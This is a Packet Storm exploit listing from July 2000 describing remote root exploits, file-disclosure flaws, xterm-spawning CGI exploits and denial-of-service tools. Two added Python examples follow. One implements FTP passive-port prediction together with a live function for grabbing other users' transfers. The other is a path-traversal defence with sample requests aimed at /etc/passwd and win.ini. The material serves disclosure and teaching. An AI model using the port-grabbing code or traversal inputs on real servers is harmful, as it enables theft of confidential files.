Packet Storm new exploits for July, 2000.
82865022ac9064a9bf0fe1824dc88233 NCSA Httpd v1.3 remote root exploit. Tested against Slackware 4.0.
d3cb7f11c6d033347321f63e6d8c5974 Bajie, a freeware HTTP daemon written in Java, has vulnerabilities which allow remote users to view any file on the system and to discover the real server path.
4df55cb734e84869146afb3bb2d45856 Foundstone Security Advisory - Two "show code" vulnerabilities exist in BEA's WebLogic 5.1.0, allowing an attacker to view the source code of any file within the web document root of the web server. Depending on the web application and directory structure, an attacker can access and view unauthorized files. Proof of concept URLs included.
eabfb1cb192fae14880ee2af89f74ca8 CVS v1.10.8 allows users to execute any binary on the server using CVS/Checkin.prog or CVS/Update.prog.
f51d22de8758d323545e1452dac4d417 BitchX-75p3 local exploit, Redhat 6.2 x86.
3107c544958dc3c7abc51124de021bea The D-Link DI-701 Residential Gateway exposes an open port which allows brute-force password guessing, and ships with a factory-set default password.
d96b5c738ace00b9ee7a62a0b8b478ed Winamp contains a buffer overflow in its M3U playlist parser. It is possible to execute arbitrary code on a remote computer via a malicious playlist. Proof of concept playlist included.
e4df2a791d526904b5ed2ac47c2e2cf7 Foundstone Security Advisory - AnalogX SimpleServer:WWW v1.06 and below is vulnerable to a "relative directory path" attack that allows a remote user to retrieve any known file on the server.
4e3ed0a0db03245950db00b35d595d3f ISBASE Security Advisory (SA2000-02) - Microsoft IIS v4.0 and 5.0 for Windows NT and Windows 2000 can be made to display the contents of files that should not normally be served, some of which contain sensitive data. IIS can be tricked into calling ISM.DLL and exposing the contents of .asp, .asa, and .ini files. Exploit description included.
41dddbddcf166833521727533f77223c Foundstone Security Advisory - AnalogX Proxy v4.04 contains multiple buffer overflows. Includes several proof of concept denial of service examples.
b35dcbfc570f44addb330eee78d4c138 Netscape 4.73 and below remote proof of concept exploit for Linux/x86. Includes a test image which crashes Netscape, a JFIF file compiler which exploits the COM marker processing vulnerability, and an unofficial patch for Mozilla M15 and Win32 Netscape.
05b9879474e6b8988cd3141760e07826 Netscape browsers v4.73 and below can be tricked into executing arbitrary assembly code by a malicious web site. In the case of Netscape Mail or News, the attack may also be performed via a mail message or a news article. A bug in the way Netscape browsers use the Independent JPEG Group's decoder library can cause the JPEG stream to be read onto the heap. Turning this vulnerability into arbitrary code execution is non-trivial, but possible on some platforms.
e3075f2ff193830fb17cb6c212c3b75c WFTPD/WFTPD Pro 2.41 RC11 contains four remote denial of service vulnerabilities. Perl proof of concept code included for each.
8ed2c7bb5eec4648fb264eabbac60bda fawx2.c sends fragmented junk to port 139, causing a blue screen under Windows 95 / 98 / 2000.
ad5c8fa7466f3e088f064eb42970726f Passive Agression is a Perl proof-of-concept exploit for downloading other users' files from FTP servers without needing their authentication. It works against servers that use passive connections for data transfers and fail to check the source address of the incoming data connection. It first attempts to determine the rate at which the server increments its data port, then guesses the next port, connects to it, and saves the retrieved data to a file. This does not work against Microsoft servers, but is fairly impressive when run against large public FTP servers. A much more sinister use would be to snag confidential files being passed between corporate networks at scheduled times, such as end-of-day batch processing of customer orders or crontab'd FTP backups.
40e4c6f40135e9d7fa06da90c1ccab3a Form Mail v1.0 (form.cgi) remote exploit - spawns an xterm from the victim computer.
c5d2f7a2b3ce3a62e0264b14bca2da10 Click Responder v1.02 remote exploit - spawns an xterm from the victim computer.
6d00b6696423fcad56ad057857da27ef bulk.cgi is a Bulk Mailer CGI which has remote vulnerabilities which allow an attacker to spawn an xterm.
1514c36c80d0afe2d5806a1eb2219d5c AlienForm2 remote CGI exploit - spawns an xterm from the target machine.
6bc28f67301d57d5da9e5441634a4767 bnbform.cgi v4.0 and below remote exploit - reads any file on the system.
23e7199f2af13c5245305c230cc7d928 BitchX (75p3/1.0c16) local exploit.
806d8b4ddd170a579ccfbf244c5bfe74 Wu-ftpd v2.4(4) remote root exploit. Exploits the SITE EXEC buffer overflow.
4e2448f983f9d4203d6c98568488a4f0 PNC Bouncer remote exploit - tested against v1.11 on RedHat 6.0, SuSE 6.3, and Mandrake 6.0.
45d6b20eb27f16d77c63be97ae0b0325 Remote buffer overflow exploit for the WN web server for Linux, version 2.0.9 and below.
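The passive-mode data port guessing that the Passive Agression entry above describes, as an added example in Python. This is not the original Perl tool's code: it parses the 227 replies a server returns for successive PASV commands, estimates the port increment from the observed sequence, and predicts the next data port. The three 227 replies are constructed sample data, and the socket step that would actually grab a transfer is included for illustration only (it needs a live server and is not exercised offline).

```python
import re
import socket
from collections import Counter

# Constructed sample 227 replies, as a passive-mode FTP server would send them
# for three successive PASV commands (example data, not a real capture).
SAMPLE_PASV_REPLIES = [
    "227 Entering Passive Mode (192,168,1,10,19,137).",
    "227 Entering Passive Mode (192,168,1,10,19,139).",
    "227 Entering Passive Mode (192,168,1,10,19,141).",
]

PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")


def parse_pasv(reply):
    """Return (host, port) from a '227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' reply.

    The data port is p1 * 256 + p2, as specified for the PASV reply in RFC 959.
    """
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError("not a PASV reply: %r" % reply)
    fields = [int(x) for x in m.groups()]
    if any(v > 255 for v in fields):
        raise ValueError("PASV field out of range")
    host = ".".join(str(v) for v in fields[:4])
    port = fields[4] * 256 + fields[5]
    return host, port


def observe_ports(replies):
    """Data ports handed out by the server, in the order they were observed."""
    return [parse_pasv(r)[1] for r in replies]


def estimate_increment(ports):
    """Most common step between successive data ports (the tool's 'incrementation rate').

    Using the mode of the deltas tolerates a few ports consumed by other clients
    between our own PASV requests.
    """
    if len(ports) < 2:
        raise ValueError("need at least two observed ports")
    deltas = [b - a for a, b in zip(ports, ports[1:])]
    step, _ = Counter(deltas).most_common(1)[0]
    return step


def predict_next_port(ports):
    """Guess the port the server will allocate for the next (someone else's) transfer."""
    return ports[-1] + estimate_increment(ports)


def grab_predicted_transfer(host, port, out_path, timeout=5.0):
    """Connect to the predicted data port and save whatever the server sends.

    This is the live network step of the attack; it only succeeds against a server
    that does not compare the data connection's source address with the control
    connection's peer. Not run in the offline demonstration below.
    """
    total = 0
    with socket.create_connection((host, port), timeout=timeout) as s, open(out_path, "wb") as f:
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            f.write(chunk)
            total += len(chunk)
    return total


if __name__ == "__main__":
    ports = observe_ports(SAMPLE_PASV_REPLIES)
    print("observed data ports:", ports)
    print("estimated increment:", estimate_increment(ports))
    print("next data port guess:", predict_next_port(ports))
```

The server-side fix is the check the entry says the affected servers omit: accept a data connection only from the same address as the control connection's peer, and allocate data ports unpredictably rather than sequentially.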
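Several entries above (Bajie, AnalogX SimpleServer:WWW's "relative directory path" attack, bnbform.cgi) come down to a web server or CGI mapping a request path onto the filesystem without confining it to the document root. The following is an added example in Python, not code from any of those products: a naive mapping beside a hardened one that URL-decodes the request, normalizes `.` and `..` segments (treating backslashes as separators as well), and rejects anything that resolves outside the document root. The document root and the request paths are assumptions for the demonstration.

```python
import posixpath
from urllib.parse import unquote

# Assumed document root for the example.
DOCROOT = "/var/www/htdocs"


def naive_resolve(docroot, request_path):
    """Vulnerable mapping: concatenate and let the filesystem sort out '..'.

    Returns the path the OS would actually open, which is how a request like
    '/../../../etc/passwd' walks out of the document root.
    """
    return posixpath.normpath(docroot + request_path)


def safe_resolve(docroot, request_path):
    """Hardened mapping: decode, normalize, then confirm the result is still under docroot.

    Returns the absolute filesystem path, or None if the request escapes the root.
    """
    decoded = unquote(request_path)
    if "\x00" in decoded:          # embedded NUL would truncate the path in C APIs
        return None
    decoded = decoded.replace("\\", "/")   # collapse '..\\' the same way as '../'
    root = posixpath.normpath(docroot)
    full = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Compare against root + "/" so that a sibling like /var/www/htdocs2 is not accepted.
    if full != root and not full.startswith(root + "/"):
        return None
    return full


# Constructed request paths: two legitimate, the rest traversal attempts.
SAMPLE_REQUESTS = [
    "/index.html",
    "/docs/../index.html",
    "/../../../etc/passwd",
    "/..%2f..%2f..%2fetc/passwd",
    "/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
    "/images/..\\..\\..\\winnt/win.ini",
]


def classify_requests(docroot, requests):
    """Map each request to (naive path, hardened path or None) for side-by-side comparison."""
    return {r: (naive_resolve(docroot, r), safe_resolve(docroot, r)) for r in requests}


if __name__ == "__main__":
    for req, (naive, safe) in classify_requests(DOCROOT, SAMPLE_REQUESTS).items():
        verdict = "REJECTED" if safe is None else safe
        print("%-40s naive=%-28s hardened=%s" % (req, naive, verdict))
```

Note that `naive_resolve` does not URL-decode, so the `%2f` and `%2e` requests stay inside the root there only because the server never decoded them; a server that decodes before concatenating, as most do, lands in the same place as the literal `../` request. The hardened version decodes exactly once; decoding again would reintroduce the double-encoding variant of the same bug.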